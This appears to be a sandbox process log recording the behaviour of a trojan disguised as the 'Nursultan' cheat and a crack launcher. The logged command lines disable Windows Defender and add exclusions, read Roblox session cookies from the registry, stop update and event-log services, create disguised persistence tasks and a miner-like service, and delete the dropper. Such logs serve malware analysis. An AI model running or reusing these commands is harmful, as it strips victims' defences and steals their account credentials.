"powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'svchost.exe'

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe'

C:\Windows\System32\Wbem\wmic.exe

"wmic.exe" os get Caption

C:\Windows\System32\Wbem\wmic.exe

"wmic.exe" computersystem get totalphysicalmemory

C:\Windows\System32\Wbem\wmic.exe

"wmic.exe" csproduct get uuid

C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe

"C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER

C:\Windows\System32\Wbem\wmic.exe

"wmic" path win32_VideoController get name

C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe

"C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Nursultan.exe'

C:\Windows\SysWOW64\schtasks.exe

"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "svchost" /tr "C:\Users\Admin\AppData\Roaming\svchost.exe"

C:\Users\Admin\AppData\Local\Temp\Nursultan.exe

"C:\Users\Admin\AppData\Local\Temp\Nursultan.exe"

C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe

"C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe"

C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force

C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop UsoSvc

C:\Windows\system32\wusa.exe

wusa /uninstall /kb:890830 /quiet /norestart

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop WaaSMedicSvc

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop wuauserv

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop bits

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop dosvc

C:\Windows\SYSTEM32\cmd.exe

"cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe" && pause

C:\Windows\system32\powercfg.exe

C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0

C:\Windows\system32\powercfg.exe

C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0

C:\Windows\system32\powercfg.exe

C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0

C:\Windows\system32\powercfg.exe

C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe delete "XMRKNZQC"

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe create "XMRKNZQC" binpath= "C:\ProgramData\scppqqgespxv\jqvljmboayxs.exe" start= "auto"

C:\Windows\system32\PING.EXE

ping localhost

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop eventlog

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe start "XMRKNZQC"

C:\ProgramData\scppqqgespxv\jqvljmboayxs.exe

C:\ProgramData\scppqqgespxv\jqvljmboayxs.exe

C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe'

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop UsoSvc

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop WaaSMedicSvc

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\wusa.exe

wusa /uninstall /kb:890830 /quiet /norestart

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop wuauserv

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop bits

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop dosvc

C:\Windows\system32\powercfg.exe

C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0

C:\Windows\system32\powercfg.exe

C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0

C:\Windows\system32\powercfg.exe

C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0

C:\Windows\system32\powercfg.exe

C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0

C:\Windows\system32\conhost.exe

C:\Windows\system32\conhost.exe

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\svchost.exe

svchost.exe

C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe

"C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe'

C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe

"C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Nursultan.exe'

C:\Windows\SYSTEM32\attrib.exe

"attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe'

C:\Users\Admin\AppData\Local\Temp\Nursultan.exe

"C:\Users\Admin\AppData\Local\Temp\Nursultan.exe"

C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe

"C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY

C:\Windows\System32\Wbem\wmic.exe

"wmic.exe" os get Caption

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe'

C:\Windows\System32\Wbem\wmic.exe

"wmic.exe" computersystem get totalphysicalmemory

C:\Windows\System32\Wbem\wmic.exe

"wmic.exe" csproduct get uuid

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER

C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe

"C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe'

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\Wbem\wmic.exe

"wmic" path win32_VideoController get name

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe

"C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Nursultan.exe'

C:\Users\Admin\AppData\Local\Temp\Nursultan.exe

"C:\Users\Admin\AppData\Local\Temp\Nursultan.exe"

C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe

"C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"

C:\Windows\SYSTEM32\cmd.exe

"cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe" && pause

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\PING.EXE

ping localhost

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe'

C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe

"C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe'

C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe

"C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Nursultan.exe'

C:\Windows\SYSTEM32\attrib.exe

"attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe'

C:\Users\Admin\AppData\Local\Temp\Nursultan.exe

"C:\Users\Admin\AppData\Local\Temp\Nursultan.exe"

C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe

"C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe'

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\Wbem\wmic.exe

"wmic.exe" os get Caption

C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force

C:\Windows\System32\Wbem\wmic.exe

"wmic.exe" computersystem get totalphysicalmemory

C:\Windows\System32\Wbem\wmic.exe

"wmic.exe" csproduct get uuid

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER

C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe

"C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe'

C:\Windows\System32\Wbem\wmic.exe

"wmic" path win32_VideoController get name

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop UsoSvc

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop WaaSMedicSvc

C:\Windows\system32\wusa.exe

wusa /uninstall /kb:890830 /quiet /norestart

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop wuauserv

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop bits

C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe

"C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Nursultan.exe'

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop dosvc

C:\Windows\system32\powercfg.exe

C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0

C:\Windows\system32\powercfg.exe

C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0

C:\Windows\system32\powercfg.exe

C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0

C:\Windows\system32\powercfg.exe

C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop eventlog

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe start "XMRKNZQC"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\ProgramData\scppqqgespxv\jqvljmboayxs.exe

C:\ProgramData\scppqqgespxv\jqvljmboayxs.exe

C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force

C:\Users\Admin\AppData\Local\Temp\Nursultan.exe

"C:\Users\Admin\AppData\Local\Temp\Nursultan.exe"

C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe

"C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop UsoSvc

C:\Windows\system32\wusa.exe

wusa /uninstall /kb:890830 /quiet /norestart

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop WaaSMedicSvc

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop wuauserv

C:\Windows\SYSTEM32\cmd.exe

"cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe" && pause

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop bits

C:\Windows\system32\PING.EXE

ping localhost

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop dosvc

C:\Windows\system32\powercfg.exe

C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0

C:\Windows\system32\powercfg.exe

C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0

C:\Windows\system32\powercfg.exe

C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0

C:\Windows\system32\powercfg.exe

C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe'

C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe

"C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe'

C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe

"C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Nursultan.exe'

C:\Windows\SYSTEM32\attrib.exe

"attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe'

C:\Users\Admin\AppData\Local\Temp\Nursultan.exe

"C:\Users\Admin\AppData\Local\Temp\Nursultan.exe"

C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe

"C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe'

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\Wbem\wmic.exe

"wmic.exe" os get Caption

C:\Windows\System32\Wbem\wmic.exe

"wmic.exe" computersystem get totalphysicalmemory

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\Wbem\wmic.exe

"wmic.exe" csproduct get uuid

C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe

"C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER

C:\Windows\System32\Wbem\wmic.exe

"wmic" path win32_VideoController get name

C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe

"C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Nursultan.exe'

C:\Users\Admin\AppData\Local\Temp\Nursultan.exe

"C:\Users\Admin\AppData\Local\Temp\Nursultan.exe"

C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe

"C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"

C:\Windows\SYSTEM32\cmd.exe

"cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe" && pause

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\PING.EXE

ping localhost

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe'

C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe

"C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe'

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe

"C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Nursultan.exe'

C:\Windows\SYSTEM32\attrib.exe

"attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe'

C:\Users\Admin\AppData\Local\Temp\Nursultan.exe

"C:\Users\Admin\AppData\Local\Temp\Nursultan.exe"

C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe

"C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\Wbem\wmic.exe

"wmic.exe" os get Caption

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe'

C:\Windows\System32\Wbem\wmic.exe

"wmic.exe" computersystem get totalphysicalmemory

C:\Windows\System32\Wbem\wmic.exe

"wmic.exe" csproduct get uuid

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe

"C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

